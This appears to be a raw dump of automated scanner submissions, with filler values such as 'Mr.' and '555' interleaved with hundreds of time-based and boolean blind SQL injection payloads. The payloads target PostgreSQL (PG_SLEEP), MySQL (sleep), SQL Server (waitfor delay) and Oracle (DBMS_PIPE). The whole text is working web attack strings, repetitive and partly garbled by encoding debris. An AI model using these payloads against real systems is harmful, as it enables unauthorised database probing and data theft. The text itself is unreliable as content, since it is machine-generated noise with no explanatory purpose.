MGrjMMyx' OR 271=(SELECT 271 FROM PG_SLEEP(15))--
Mr.
WjNez9N9') OR 268=(SELECT 268 FROM PG_SLEEP(15))--
Mr.
GrGTKoj2')) OR 26=(SELECT 26 FROM PG_SLEEP(15))--
Mr.
555
Mr.
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
Mr.
555
Mr.
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
Xt3X8JBB
555
-1 OR 2+837-837-1=0+0+0+1 --
555
-1 OR 2+867-867-1=0+0+0+1
555
-1' OR 2+171-171-1=0+0+0+1 --
555
-1' OR 2+983-983-1=0+0+0+1 or 'oBakeoXV'='
555
-1" OR 2+458-458-1=0+0+0+1 --
555
Mr.
1'"
Mr.
1'"
Mr.
1����%2527%2522
Mr.
@@QK56M
-1" OR 2+458-458-1=0+0+0+1 --
555
if(now()=sysdate(),sleep(15),0)
555
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
555
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
1 waitfor delay '0:0:15' --
555
9tx7FfLK'; waitfor delay '0:0:15' --
555
Nll82e4R'); waitfor delay '0:0:15' --
555
mjrVOP11')); waitfor delay '0:0:15' --
555
pUk4OZT8' OR 262=(SELECT 262 FROM PG_SLEEP(15))--
555
nWaezRbI') OR 31=(SELECT 31 FROM PG_SLEEP(15))--
555
uoDc9RTE')) OR 969=(SELECT 969 FROM PG_SLEEP(15))--
555
Mr.'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
1'"
555
1 ����%2527%2522
555
@@O7F4h
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
QadTyG0J
Mr.
1*
Mr.
1*
Mr.
1*
Mr.
1*
Mr.
-1 OR 2+606-606-1=0+0+0+1
Mr.
-1 OR 3+606-606-1=0+0+0+1
Mr.
if(now()=sysdate(),sleep(15),0)
Mr.
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
Mr.
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
Mr.
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
Mr.
-1; waitfor delay '0:0:15' --
Mr.
-1); waitfor delay '0:0:15' --
Mr.
-1)); waitfor delay '0:0:15' --
Mr.
1 waitfor delay '0:0:15' --
Mr.
YtauwAae'; waitfor delay '0:0:15' --
Mr.
r5M5Z2oU'); waitfor delay '0:0:15' --
Mr.
bxBzM1OV')); waitfor delay '0:0:15' --
Mr.
-5 OR 722=(SELECT 722 FROM PG_SLEEP(15))--
Mr.
-5) OR 306=(SELECT 306 FROM PG_SLEEP(15))--
Mr.
-1)) OR 936=(SELECT 936 FROM PG_SLEEP(15))--
Mr.
HiYokVYu' OR 707=(SELECT 707 FROM PG_SLEEP(15))--
Mr.
qvZnBpfJ') OR 250=(SELECT 250 FROM PG_SLEEP(15))--
Mr.
F42VtsDk')) OR 707=(SELECT 707 FROM PG_SLEEP(15))--
Mr.
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
Mr.
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
Mr.
1'"
Mr.
1����%2527%2522
Mr.
@@PGSSR
Mr.
-1 OR 2+770-770-1=0+0+0+1 --
Mr.
-1 OR 3+770-770-1=0+0+0+1 --
Mr.
-1 OR 2+819-819-1=0+0+0+1
Mr.
-1 OR 3+819-819-1=0+0+0+1
Mr.
-1' OR 2+328-328-1=0+0+0+1 --
Mr.
-1' OR 3+328-328-1=0+0+0+1 --
Mr.
-1' OR 2+556-556-1=0+0+0+1 or 'yhXpzPtZ'='
Mr.
-1' OR 3+556-556-1=0+0+0+1 or 'yhXpzPtZ'='
Mr.
-1" OR 2+862-862-1=0+0+0+1 --
Mr.
-1" OR 3+862-862-1=0+0+0+1 --
Mr.
if(now()=sysdate(),sleep(15),0)
Mr.
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
Mr.
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
Mr.
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
Mr.
-1; waitfor delay '0:0:15' --
Mr.
-1); waitfor delay '0:0:15' --
Mr.
-1)); waitfor delay '0:0:15' --
Mr.
1 waitfor delay '0:0:15' --
Mr.
vFKab0cY'; waitfor delay '0:0:15' --
Mr.
DuIomQOd'); waitfor delay '0:0:15' --
Mr.
s1tdjfh3')); waitfor delay '0:0:15' --
Mr.
-5 OR 660=(SELECT 660 FROM PG_SLEEP(15))--
Mr.
-5) OR 886=(SELECT 886 FROM PG_SLEEP(15))--
Mr.
-1)) OR 229=(SELECT 229 FROM PG_SLEEP(15))--
Mr.
nOQBbPNj' OR 338=(SELECT 338 FROM PG_SLEEP(15))--
Mr.
3PityDl7') OR 253=(SELECT 253 FROM PG_SLEEP(15))--
Mr.
FJDmgnub')) OR 966=(SELECT 966 FROM PG_SLEEP(15))--
Mr.
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
Mr.
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
Mr.
1'"
Mr.
1����%2527%2522
Mr.
@@mk5q1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
UOwiOR47
1
-1 OR 2+699-699-1=0+0+0+1 --
1
-1 OR 2+484-484-1=0+0+0+1
1
-1' OR 2+693-693-1=0+0+0+1 --
1
-1' OR 2+605-605-1=0+0+0+1 or 'olNyouZR'='
1
-1" OR 2+61-61-1=0+0+0+1 --
1
if(now()=sysdate(),sleep(15),0)
1
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
1
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
1
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
1
1 waitfor delay '0:0:15' --
1
fWrADYm1'; waitfor delay '0:0:15' --
1
wuYNOGqm'); waitfor delay '0:0:15' --
1
l5aP3034')); waitfor delay '0:0:15' --
1
AGpBlIIL' OR 792=(SELECT 792 FROM PG_SLEEP(15))--
1
QcJRYf5O') OR 285=(SELECT 285 FROM PG_SLEEP(15))--
1
VDby5xGE')) OR 267=(SELECT 267 FROM PG_SLEEP(15))--
1
Mr.'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1
1'"
1
1 ����%2527%2522
1
@@sMVaN
1
Mr.
1
Mr.
1
Mr.
UkOy5Vln
Mr.
-1 OR 2+325-325-1=0+0+0+1 --
Mr.
-1 OR 2+550-550-1=0+0+0+1
Mr.
-1' OR 2+888-888-1=0+0+0+1 --
Mr.
-1' OR 2+194-194-1=0+0+0+1 or 'DCASzywt'='
Mr.
-1" OR 2+462-462-1=0+0+0+1 --
Mr.
if(now()=sysdate(),sleep(15),0)
Mr.
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
Mr.
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
Mr.
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
Mr.
-1; waitfor delay '0:0:15' --
Mr.
-1); waitfor delay '0:0:15' --
Mr.
-1)); waitfor delay '0:0:15' --
Mr.
1 waitfor delay '0:0:15' --
Mr.
tlhalBpw'; waitfor delay '0:0:15' --
Mr.
Im67teXp'); waitfor delay '0:0:15' --
Mr.
l1wfAbi7')); waitfor delay '0:0:15' --
Mr.
-5 OR 585=(SELECT 585 FROM PG_SLEEP(15))--
Mr.
-5) OR 444=(SELECT 444 FROM PG_SLEEP(15))--
Mr.
-1)) OR 717=(SELECT 717 FROM PG_SLEEP(15))--
Mr.
R9nKZQwk' OR 420=(SELECT 420 FROM PG_SLEEP(15))--
Mr.
e6qydyyl') OR 97=(SELECT 97 FROM PG_SLEEP(15))--
Mr.
LqgQJj7h')) OR 916=(SELECT 916 FROM PG_SLEEP(15))--
Mr.
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
Mr.
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
Mr.
1'"
Mr.
1����%2527%2522
Mr.
@@AIZVV
Mr.
XO9huemX
Mr.
1*
Mr.
1*
Mr.
1*
Mr.
1*
Mr.
-1 OR 2+640-640-1=0+0+0+1
Mr.
-1 OR 3+640-640-1=0+0+0+1
Mr.
if(now()=sysdate(),sleep(15),0)
Mr.
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
Mr.
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
Mr.
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
Mr.
-1; waitfor delay '0:0:15' --
Mr.
-1); waitfor delay '0:0:15' --
Mr.
-1)); waitfor delay '0:0:15' --
Mr.
1 waitfor delay '0:0:15' --
Mr.
tUHA9dFB'; waitfor delay '0:0:15' --
Mr.
k816590r'); waitfor delay '0:0:15' --
Mr.
uyHuqkYP')); waitfor delay '0:0:15' --
Mr.
-5 OR 976=(SELECT 976 FROM PG_SLEEP(15))--
Mr.
-5) OR 768=(SELECT 768 FROM PG_SLEEP(15))--
Mr.
-1)) OR 984=(SELECT 984 FROM PG_SLEEP(15))--
Mr.
mMvfM1JK' OR 971=(SELECT 971 FROM PG_SLEEP(15))--
Mr.
PRoNixJ8') OR 150=(SELECT 150 FROM PG_SLEEP(15))--
Mr.
10aYlwiu')) OR 928=(SELECT 928 FROM PG_SLEEP(15))--
Mr.
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
Mr.
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
Mr.
1'"
Mr.
1����%2527%2522
Mr.
@@0D4jx
Mr.
555
Mr.
555
Mr.
555
04hRjNJl
555
-1 OR 2+488-488-1=0+0+0+1 --
555
-1 OR 2+953-953-1=0+0+0+1
555
-1' OR 2+453-453-1=0+0+0+1 --
555
-1' OR 2+667-667-1=0+0+0+1 or 'Ji3OipAJ'='
555
-1" OR 2+937-937-1=0+0+0+1 --
555
if(now()=sysdate(),sleep(15),0)
555
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
555
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
1 waitfor delay '0:0:15' --
555
ykS4PnBa'; waitfor delay '0:0:15' --
555
tGyJ11wu'); waitfor delay '0:0:15' --
555
Hby3oxPB')); waitfor delay '0:0:15' --
555
zfd3KtGi' OR 438=(SELECT 438 FROM PG_SLEEP(15))--
555
mSR5w9Sz') OR 213=(SELECT 213 FROM PG_SLEEP(15))--
555
yIBKlsgj')) OR 927=(SELECT 927 FROM PG_SLEEP(15))--
555
Mr.'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
1'"
555
1 ����%2527%2522
555
@@qfI9u
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
1
Mr.
1
Mr.
1
Mr.
1
0pZ57NRt
1
-1 OR 2+25-25-1=0+0+0+1 --
1
-1 OR 2+53-53-1=0+0+0+1
1
-1' OR 2+361-361-1=0+0+0+1 --
1
-1' OR 2+337-337-1=0+0+0+1 or 'E0PXHQpE'='
1
-1" OR 2+252-252-1=0+0+0+1 --
1
if(now()=sysdate(),sleep(15),0)
1
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
1
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
1
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
1
1 waitfor delay '0:0:15' --
1
4pNdsXRq'; waitfor delay '0:0:15' --
1
5XZ8TKMH'); waitfor delay '0:0:15' --
1
NZHNeZaV')); waitfor delay '0:0:15' --
1
sXWOxVag' OR 218=(SELECT 218 FROM PG_SLEEP(15))--
1
CeTJKZwI') OR 811=(SELECT 811 FROM PG_SLEEP(15))--
1
eKRlzUTX')) OR 123=(SELECT 123 FROM PG_SLEEP(15))--
1
Mr.'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1
1'"
1
1 ����%2527%2522
1
@@JjlcP
1
Mr.
1
Mr.
1
Mr.
narMCvZa
Mr.
-1 OR 2+700-700-1=0+0+0+1 --
Mr.
-1 OR 2+28-28-1=0+0+0+1
Mr.
-1' OR 2+831-831-1=0+0+0+1 --
Mr.
-1' OR 2+361-361-1=0+0+0+1 or 'lH82DCrW'='
Mr.
-1" OR 2+719-719-1=0+0+0+1 --
Mr.
if(now()=sysdate(),sleep(15),0)
Mr.
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
Mr.
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
Mr.
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
Mr.
-1; waitfor delay '0:0:15' --
Mr.
-1); waitfor delay '0:0:15' --
Mr.
-1)); waitfor delay '0:0:15' --
Mr.
1 waitfor delay '0:0:15' --
Mr.
OoIriEFB'; waitfor delay '0:0:15' --
Mr.
3n1NGEGl'); waitfor delay '0:0:15' --
Mr.
3HfMr8lG')); waitfor delay '0:0:15' --
Mr.
-5 OR 211=(SELECT 211 FROM PG_SLEEP(15))--
Mr.
-5) OR 960=(SELECT 960 FROM PG_SLEEP(15))--
Mr.
-1)) OR 778=(SELECT 778 FROM PG_SLEEP(15))--
Mr.
hftgHkKi' OR 926=(SELECT 926 FROM PG_SLEEP(15))--
Mr.
YPWtjYTx') OR 647=(SELECT 647 FROM PG_SLEEP(15))--
Mr.
ek6Csc36')) OR 509=(SELECT 509 FROM PG_SLEEP(15))--
Mr.
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
Mr.
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
Mr.
1'"
Mr.
1����%2527%2522
Mr.
@@ILJMz
Mr.
-1 OR 2+831-831-1=0+0+0+1 --
Mr.
-1 OR 3+831-831-1=0+0+0+1 --
Mr.
-1 OR 2+645-645-1=0+0+0+1
Mr.
-1 OR 3+645-645-1=0+0+0+1
Mr.
-1' OR 2+299-299-1=0+0+0+1 --
Mr.
-1' OR 3+299-299-1=0+0+0+1 --
Mr.
-1' OR 2+866-866-1=0+0+0+1 or 'ylDE62Rj'='
Mr.
-1' OR 3+866-866-1=0+0+0+1 or 'ylDE62Rj'='
Mr.
-1" OR 2+914-914-1=0+0+0+1 --
Mr.
-1" OR 3+914-914-1=0+0+0+1 --
Mr.
if(now()=sysdate(),sleep(15),0)
Mr.
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
Mr.
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
Mr.
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
Mr.
-1; waitfor delay '0:0:15' --
Mr.
-1); waitfor delay '0:0:15' --
Mr.
-1)); waitfor delay '0:0:15' --
Mr.
1 waitfor delay '0:0:15' --
Mr.
xAiGNRrG'; waitfor delay '0:0:15' --
Mr.
WDPGd6zE'); waitfor delay '0:0:15' --
Mr.
HOBoJnp4')); waitfor delay '0:0:15' --
Mr.
-5 OR 463=(SELECT 463 FROM PG_SLEEP(15))--
Mr.
-5) OR 825=(SELECT 825 FROM PG_SLEEP(15))--
Mr.
-1)) OR 740=(SELECT 740 FROM PG_SLEEP(15))--
Mr.
RwSn4Lnq' OR 307=(SELECT 307 FROM PG_SLEEP(15))--
Mr.
Xfium3Ly') OR 544=(SELECT 544 FROM PG_SLEEP(15))--
Mr.
4IN5ZQTY')) OR 302=(SELECT 302 FROM PG_SLEEP(15))--
Mr.
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
Mr.
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
Mr.
1'"
Mr.
1����%2527%2522
Mr.
@@HK0I3
Mr.
555
Mr.
555
Mr.
555
Mr.
WDjXopbt
Mr.
-1 OR 2+224-224-1=0+0+0+1 --
Mr.
-1 OR 2+13-13-1=0+0+0+1
Mr.
-1' OR 2+543-543-1=0+0+0+1 --
Mr.
-1' OR 2+520-520-1=0+0+0+1 or 'ieIkgLV9'='
Mr.
-1" OR 2+237-237-1=0+0+0+1 --
Mr.
if(now()=sysdate(),sleep(15),0)
Mr.
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
Mr.
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
Mr.
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
Mr.
-1; waitfor delay '0:0:15' --
Mr.
-1); waitfor delay '0:0:15' --
Mr.
-1)); waitfor delay '0:0:15' --
Mr.
1 waitfor delay '0:0:15' --
Mr.
0VkNrWJ1'; waitfor delay '0:0:15' --
Mr.
OyArp6My'); waitfor delay '0:0:15' --
Mr.
2W5SXVJw')); waitfor delay '0:0:15' --
Mr.
-5 OR 727=(SELECT 727 FROM PG_SLEEP(15))--
Mr.
-5) OR 509=(SELECT 509 FROM PG_SLEEP(15))--
Mr.
-1)) OR 768=(SELECT 768 FROM PG_SLEEP(15))--
Mr.
jhaMKMC9' OR 472=(SELECT 472 FROM PG_SLEEP(15))--
Mr.
d27pid2V') OR 546=(SELECT 546 FROM PG_SLEEP(15))--
Mr.
lkZh70qY')) OR 191=(SELECT 191 FROM PG_SLEEP(15))--
Mr.
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
Mr.
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
Mr.
1'"
Mr.
1����%2527%2522
Mr.
@@YcImM
Mr.
555
Mr.
555
f9XzNfcm
555
-1 OR 2+624-624-1=0+0+0+1 --
555
-1 OR 2+71-71-1=0+0+0+1
555
-1' OR 2+913-913-1=0+0+0+1 --
555
-1' OR 2+358-358-1=0+0+0+1 or 'yvEfP9WG'='
555
-1" OR 2+799-799-1=0+0+0+1 --
555
if(now()=sysdate(),sleep(15),0)
555
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
555
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
1 waitfor delay '0:0:15' --
555
ORkwkRB1'; waitfor delay '0:0:15' --
555
w1KatROP'); waitfor delay '0:0:15' --
555
3sgdxXel')); waitfor delay '0:0:15' --
555
YGu5iXsB' OR 106=(SELECT 106 FROM PG_SLEEP(15))--
555
gsJVLeRS') OR 781=(SELECT 781 FROM PG_SLEEP(15))--
555
Xelp4mgx')) OR 401=(SELECT 401 FROM PG_SLEEP(15))--
555
Mr.'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
1'"
555
1 ����%2527%2522
555
@@cFZVZ
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555